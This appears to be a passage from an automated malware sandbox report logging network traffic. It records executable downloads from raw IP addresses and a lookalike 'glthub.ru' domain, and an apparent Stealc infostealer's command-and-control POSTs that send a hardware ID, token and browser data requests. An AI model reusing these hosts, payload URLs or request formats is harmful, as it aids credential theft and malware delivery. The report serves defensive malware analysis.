Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:53 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:19:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 27 Sep 2024 14:10:20 GMTETag: "11d000-6231a6a5cf580"Accept-Ranges: bytesContent-Length: 1167360Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c4 bc f6 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 20 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 12 00 00 04 00 00 b0 f3 11 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 64 64 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 64 64 04 00 00 40 0d 00 00 66 04 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 11 00 00 76 00 00 00 5a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:19:08 GMTContent-Type: application/octet-streamContent-Length: 1940480Last-Modified: Fri, 27 Sep 2024 14:11:16 GMTConnection: keep-aliveETag: "66f6bd04-1d9c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 f0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4d 00 00 04 00 00 b9 fd 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 cf 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 ce 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 75 74 6c 6a 67 7a 64 00 90 1a 00 00 50 32 00 00 82 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 68 74 65 77 6c 61 7a 00 10 00 00 00 e0 4c 00 00 04 00 00 00 76 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4c 00 00 22 00 00 00 7a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /file1.exe HTTP/1.1Host: glthub.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download/Microsoft-Edge.exe HTTP/1.1Host: eijfrhegrtbrfcd.online
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /12dsvc.exe HTTP/1.1Host: 194.116.215.195
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000004001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000005001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.17Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: 185.215.113.17Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 35 45 30 31 35 42 38 41 39 38 32 33 33 33 33 36 34 31 39 32 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 32 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 2d 2d 0d 0a Data Ascii: ------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="hwid"A95E015B8A982333364192------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="build"default2------IDAAFBGDBKJJJKFIIIJJ--
Source: global traffic HTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFIHost: 185.215.113.17Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 2d 2d 0d 0a Data Ascii: ------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="message"browsers------KKECFIEBGCAKJKECGCFI--
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBFHost: 185.215.113.17Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 46 2d 2d 0d 0a Data Ascii: ------JKKKJJJKJKFHJJJJECBFContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------JKKKJJJKJKFHJJJJECBFContent-Disposition: form-data; name="message"plugins------JKKKJJJKJKFHJJJJECBF--
